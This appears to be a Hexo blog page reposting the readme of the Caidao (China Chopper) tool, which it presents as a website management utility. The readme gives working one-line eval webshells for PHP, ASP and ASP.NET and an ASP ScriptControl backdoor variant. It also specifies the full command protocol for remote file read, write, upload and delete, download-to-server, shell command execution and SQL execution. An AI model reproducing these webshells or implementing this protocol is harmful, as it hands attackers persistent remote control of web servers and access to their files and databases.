<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="菜刀 &#x2F; Caidao @ http:&#x2F;&#x2F;www.maicaidao.com&#x2F; 菜刀，他是一款专业的网站管理工具   一、网站管理模块放在网站上的脚本程序分两种：  　　1）“一句话(Eval)”：    PHP, ASP, ASP.NET 的网站都可以，支持https。下面的代码放在网站目录即可开始管理，比FTP好用多了是不是：　　    PHP:    　　    ASP:    &lt;%e">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/2022/05/25/readme/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="菜刀 &#x2F; Caidao @ http:&#x2F;&#x2F;www.maicaidao.com&#x2F; 菜刀，他是一款专业的网站管理工具   一、网站管理模块放在网站上的脚本程序分两种：  　　1）“一句话(Eval)”：    PHP, ASP, ASP.NET 的网站都可以，支持https。下面的代码放在网站目录即可开始管理，比FTP好用多了是不是：　　    PHP:    　　    ASP:    &lt;%e">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-05-25T12:25:24.314Z">
<meta property="article:modified_time" content="2022-05-25T12:08:34.475Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.4.2"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-readme" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2022/05/25/readme/" class="article-date">
  <time datetime="2022-05-25T12:25:24.314Z" itemprop="datePublished">2022-05-25</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="菜刀-Caidao-http-www-maicaidao-com"><a href="#菜刀-Caidao-http-www-maicaidao-com" class="headerlink" title="菜刀 / Caidao @ http://www.maicaidao.com/"></a>菜刀 / Caidao @ <a target="_blank" rel="noopener" href="http://www.maicaidao.com/">http://www.maicaidao.com/</a></h2><pre><code> 菜刀，他是一款专业的网站管理工具
</code></pre>
<hr>
<h2 id="一、网站管理模块"><a href="#一、网站管理模块" class="headerlink" title="一、网站管理模块"></a>一、网站管理模块</h2><pre><code>放在网站上的脚本程序分两种：
</code></pre>
<p>　　1）“一句话(Eval)”：<br>    PHP, ASP, ASP.NET 的网站都可以，支持https。下面的代码放在网站目录即可开始管理，比FTP好用多了是不是：<br>　　    PHP:    <?php @eval($_POST['caidao']);?><br>　　    ASP:    &lt;%eval request(“caidao”)%&gt;<br>　　    ASP.NET:    &lt;%@ Page Language=”Jscript”%&gt;&lt;%eval(Request.Item[“caidao”],”unsafe”);%&gt;</p>
<pre><code>2）自己开发的脚本程序(Customize)：

理论上支持所有动态脚本,只要正确与菜刀进行交互即可。调用方法请参阅后面的 “Customize模式菜刀和服务端通信接口”。


---------------------------------------------------------------------------------------------------------
</code></pre>
<p>​<br>　　常用功能介绍</p>
<p>　　    1. 文件管理：[特色]缓存下载目录，并支持离线查看缓存目录;</p>
<p>　　    2. 虚拟终端：[特色]人性化的设计，操作方便;(输入HELP查看更多用法), 超长命令会分割为5k字节一份，分别提交。</p>
<p>　　    3. 数据库管理：[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,POSTGRESQL,ACCESS, 以及支持ADO方式连接的数据库。</p>
<pre><code>      4. 自写脚本（只有Eval端才支持）：
       
       通过简单编码后提交用户自己的脚本到服务端执行，实现丰富的功能，也可选择发送到浏览器执行。
       
       如果要写自己的CCC脚本，可以参考一下CCC目录下的示例代码, 相信你也可以写出功能丰富的脚本。
       
       可以在官网下载别人的CCC脚本，或分享你的得意之作。
</code></pre>
<p>　　配置框填写说明</p>
<pre><code>----------------
A)  数据库相关：
----------------
PHP：
&lt;T&gt;类型&lt;/T&gt; 类型可为MYSQL,MSSQL,ORACLE,INFOMIX,POSTGRESQL中的一种
&lt;H&gt;主机地址&lt;H&gt; 主机地址可为机器名或IP地址，如localhost
&lt;U&gt;数据库用户&lt;/U&gt; 连接数据库的用户名，如root
&lt;P&gt;数据库密码&lt;/P&gt; 连接数据库的密码，如123455
&lt;N&gt;默认库&lt;/N&gt; 默认连接的库名

&lt;L&gt;utf8&lt;/L&gt; 这一项数据库类型为MYSQL脚本为PHP时可选，不填则为latin1

ASP 和 ASP.NET：
&lt;T&gt;类型&lt;/T&gt; 类型只能填ADO
&lt;C&gt;ADO配置信息&lt;/C&gt;
ADO连接各种数据库的方式不一样。如MSSQL的配置信息为
    Driver=&#123;Sql Server&#125;;Server=(local);Database=master;Uid=sa;Pwd=123456;

Customize：
&lt;T&gt;类型&lt;/T&gt; 类型只能填XDB
&lt;X&gt;与Customize 脚本约定的配置信息&lt;/X&gt;
菜刀自带的Customize.jsp数据库参数填写方法如下(两行)：
MSSQL:
    &lt;X&gt;
    com.microsoft.sqlserver.jdbc.SQLServerDriver
    jdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456
    &lt;/X&gt;
MYSQL:
    &lt;X&gt;
    com.mysql.jdbc.Driver
    jdbc:mysql://localhost/test?user=root&amp;password=123456
    &lt;/X&gt;
ORACLE:
    &lt;X&gt;
    oracle.jdbc.driver.OracleDriver
    jdbc:oracle:thin:user/password@127.0.0.1:1521/test
    &lt;/X&gt;

-------------
B) 其它配置：
-------------

添加额外附加提交的数据，如ASP的新服务端是这样的：
&lt;%
Set o = Server.CreateObject(&quot;ScriptControl&quot;)
o.language = &quot;vbscript&quot;
o.addcode(Request(&quot;SC&quot;))
o.run &quot;ff&quot;,Server,Response,Request,Application,Session,Error
%&gt;
那么，菜刀在配置处填入：
&lt;O&gt;SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request(&quot;caidao&quot;)):end+function&lt;/O&gt;
然后以密码caidao来连接即可。

默认终端程序路径设置示例：
&lt;SHELL&gt;/bin/sh&lt;/SHELL&gt;

虚拟终端默认命令设置示例：
&lt;CMD&gt;whoami&lt;/CMD&gt;

文件管理默认打开的目录设置示例：
&lt;CD&gt;c:\windows\temp\&lt;/CD&gt;
</code></pre>
<p>　　如果你网站开通了HTTP登录验证，可以这样填地址：</p>
<pre><code>http://user:pass@maicaidao.com/admin.asp
用户名密码中的特殊字符可用URL编码转换。


【20160620后的版本多了个文件caidao.conf】

 这个文件是必须有的，里面的各节点一个也不能删，不然程序运行会出错！
 默认调用的是caidao.conf，菜单里有个“加载配置文件”的菜单项，可以切换配置文件。
 这个文件必段存为UNICODE编码！
 各节点简单介绍一下：
&lt;FLAG&gt;    返回的内容分隔符，只限三个字符，用生辟点的字符吧。
&lt;UA&gt;    自定义User-Agent的值
&lt;K1&gt;    POST的第一个参数名称，不再是原版本固定的z1
&lt;K2&gt;    同上

&lt;PHP_BASE&gt;    这是PHP脚本的基本代码，其它的功能代码最终会传到这里面，注意里面的%s %d这样的参数
&lt;ASP_BASE&gt;    同上
&lt;ASPX_BASE&gt;    同上
&lt;PHP_BASE.加密示例&gt;    这个不会用到，如果临时复制出来一个节点，可以取一个不同的节点名字，不要重名了。
    这里示范的是如何把PHP_BASE的内容加密发送。
    相信你会做得更好。
&lt;GETBASEINFO&gt;
&lt;SHOWFOLDER&gt;
&lt;SHOWTXTFILE&gt;
&lt;SAVETXTFILE&gt;
&lt;DELETEFILE&gt;
&lt;DOWNFILE&gt;
&lt;UPLOADFILE&gt;
&lt;PASTEFILE&gt;
&lt;NEWFOLDER&gt;
&lt;WGET&gt;
&lt;SHELL&gt;
&lt;RENAME&gt;
&lt;SETTIME&gt;
-----------上面这些，你懂的，就不费篇幅了
&lt;DB_PHP_MYSQL_DBLIST&gt;        PHP脚本刚连接时调用这里，给出库列表
&lt;DB_PHP_MYSQL_TABLELIST&gt;    点击库调用，显示数据表
&lt;DB_PHP_MYSQL_COLUMNLIST&gt;    点击数据表调用，显示数据表字段
&lt;DB_PHP_MYSQL_EXECUTESQL&gt;    执行SQL，分别处理查询和执行并给出结果。
....
接下来的几样都是PHP连其它库的，大同小异。
&lt;DB_ASP_ADO_DBLIST&gt;
&lt;DB_ASP_ADO_TABLELIST&gt;
&lt;DB_ASP_ADO_COLUMNLIST&gt;
&lt;DB_ASP_ADO_EXECUTESQL&gt;
上面是ASP管理数据库的脚本，用ADO来整的。
&lt;DB_ASPX_ADO_DBLIST&gt;
&lt;DB_ASPX_ADO_TABLELIST&gt;
&lt;DB_ASPX_ADO_COLUMNLIST&gt;
&lt;DB_ASPX_ADO_EXECUTESQL&gt;
ASPX的，当然还有其它好用的方式，看你的习惯来改了。
</code></pre>
<h2 id="二、记事本"><a href="#二、记事本" class="headerlink" title="二、记事本"></a>二、记事本</h2><pre><code>忽然觉得有个地方记录点东西还是挺方便的。
</code></pre>
<h2 id="三、浏览器"><a href="#三、浏览器" class="headerlink" title="三、浏览器"></a>三、浏览器</h2><pre><code>就是一个专用的网页浏览器，
Post浏览/自定义Cookies,/执行自定义脚本/自动刷新页面/同IP网页搜索。
如果有ip.dat库，在状态栏会显示此网站的IP,国家代码。
</code></pre>
<hr>
<p>新版本去掉了一些不想用的功能，</p>
<hr>
<h2 id="文件说明："><a href="#文件说明：" class="headerlink" title="文件说明："></a>文件说明：</h2><p>caidao.exe    菜刀程序<br>db.mdb        菜刀的主数据库<br>caidao.conf    配置文件（重要，千万别删除）</p>
<hr>
<p>cache.tmp    菜刀的缓存数据库(可删除)<br>readme.txt    你现在正在看的(可删除)<br>ip.dat        一个IP库，用于IP地址识别(可删除)<br><CCC>        菜刀的自写脚本目录(可删除)<br><Customize>    Customize模式的服务端(可删除)<br>    Customize.aspx    这是一个C#的示例服务端(全功能)<br>    Customize.jsp    这是一个jsp的示例服务端(全功能)<br>    Customize.cfm    这是一个cfm的示例服务端(文件管理，虚拟终端)</p>
<hr>
<h2 id="附：Customize模式菜刀和服务端通信接口"><a href="#附：Customize模式菜刀和服务端通信接口" class="headerlink" title="附：Customize模式菜刀和服务端通信接口"></a>附：Customize模式菜刀和服务端通信接口</h2><p>其它语言的服务端代码可按此接口来编写(请参照Customize.jsp/Customize.cfm/Customize.aspx)</p>
<p>例：菜刀客户端填写的密码为pass，网页编码选的是GB2312(Jsp服务端会用到此参数)<br>注：所有参数都以POST提交，<br>    返回的数据都要以配置文件caidao.conf中的FLAG节点填写的标记分隔<br>    提交的参数z0.z1.z2…<br>注：返回的错误信息开头包含ERROR://<br>注：\t代表制表符TAB，\r\n代表换行回车，\n代表回车<br>注：数据库配置信息是一个字符串，服务端脚本可以对此字符串格式进行自定义。</p>
<hr>
<p>[得到当前目录的绝对路径]<br>提交：pass=A&amp;z0=GB2312<br>返回：目录的绝对路径\t，如果是Windows系统后面接着加上驱动器列表<br>示例：c:\inetpub\wwwroot\    C:D:E:K:<br>示例：/var/www/html/    </p>
<p>[目录浏览]<br>提交：pass=B&amp;z0=GB2312&amp;z1=目录绝对路径<br>返回：先目录后文件,目录名后要加/，文件名后不要加/<br>示例：<br>    目录名/\t时间\t大小\t属性\n目录名/\t时间\t大小\t属性\n<br>    文件名\t时间\t大小\t属性\n文件名\t时间\t大小\t属性\n</p>
<p>[读取文本文件]<br>提交：pass=C&amp;z0=GB2312&amp;z1=文件绝对路径<br>返回：文本文件的内容</p>
<p>[写入文本文件]<br>提交：pass=D&amp;z0=GB2312&amp;z1=文件绝对路径&amp;z2=文件内容<br>返回：成功返回1,不成功返回错误信息</p>
<p>[删除文件或目录]<br>提交：pass=E&amp;z0=GB2312&amp;z1=文件或目录的绝对路径<br>返回：成功返回1,不成功返回错误信息</p>
<p>[下载文件]<br>提交：pass=F&amp;z0=GB2312&amp;z1=服务器文件的绝对路径<br>返回：要下载文件的内容</p>
<p>[上传文件]<br>提交：pass=G&amp;z0=GB2312&amp;z1=文件上传后的绝对路径&amp;z2=文件内容(十六进制文本格式)<br>返回：要下载文件的内容</p>
<p>[复制文件或目录后粘贴]<br>提交：pass=H&amp;z0=GB2312&amp;z1=复制的绝对路径&amp;z2=粘贴的绝对路径<br>返回：成功返回1,不成功返回错误信息</p>
<p>[文件或目录重命名]<br>提交：pass=I&amp;z0=GB2312&amp;z1=原名(绝对路径)&amp;z2=新名(绝对路径)<br>返回：成功返回1,不成功返回错误信息</p>
<p>[新建目录]<br>提交：pass=J&amp;z0=GB2312&amp;z1=新目录名(绝对路径)<br>返回：成功返回1,不成功返回错误信息</p>
<p>[修改文件或目录时间]<br>提交：pass=K&amp;z0=GB2312&amp;z1=文件或目录的绝对路径&amp;z2=时间(格式：yyyy-MM-dd HH:mm:ss)<br>返回：成功返回1,不成功返回错误信息</p>
<p>[下载文件到服务器]<br>提交：pass=L&amp;z0=GB2312&amp;z1=URL路径&amp;z2=下载后保存的绝对路径<br>返回：成功返回1,不成功返回错误信息</p>
<p>[执行Shell命令(Shell路径前会根据服务器系统类型加上-c或/c参数)]<br>提交：pass=M&amp;z0=GB2312&amp;z1=(-c或/c)加Shell路径&amp;z2=Shell命令<br>返回：命令执行结果</p>
<p>[得到数据库基本信息]<br>提交：pass=N&amp;z0=GB2312&amp;z1=数据库配置信息<br>返回：成功返回数据库(以制表符\t分隔)， 不成功返回错误信息</p>
<p>[获取数据库表名]<br>提交：pass=O&amp;z0=GB2312&amp;z1=数据库配置信息\r\n数据库名<br>返回：成功返回数据表(以\t分隔)， 不成功返回错误信息</p>
<p>[获取数据表列名]<br>提交：pass=P&amp;z0=GB2312&amp;z1=数据库配置信息\r\n数据库名\r\n数据表名<br>返回：成功返回数据列(以制表符\t分隔)， 不成功返回错误信息</p>
<p>[执行数据库命令]<br>提交：pass=Q&amp;z0=GB2312&amp;z1=数据库配置信息\r\n数据库名&amp;z2=SQL命令<br>返回：成功返回数据表内容， 不成功返回错误信息<br>注意：返回的第一行为表头，接下去每行分别在列表中显示，列数要求一致。行中的每列后加上\t|\t标记，每行以标记\r\n为结束</p>
<hr>
<pre><code>                    菜刀 七岁了 感谢有你一路陪伴成长!
















                                    L408179
</code></pre>
<hr>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2022/05/25/readme/" data-id="cl3lkjw190000r0v240ec4wd7" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2022/05/25/article-title/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          article title
        
      </div>
    </a>
  
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/05/">May 2022</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/05/25/article-title-1/">article title</a>
          </li>
        
          <li>
            <a href="/2022/05/25/article-title/">article title</a>
          </li>
        
          <li>
            <a href="/2022/05/25/readme/">(no title)</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2022 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>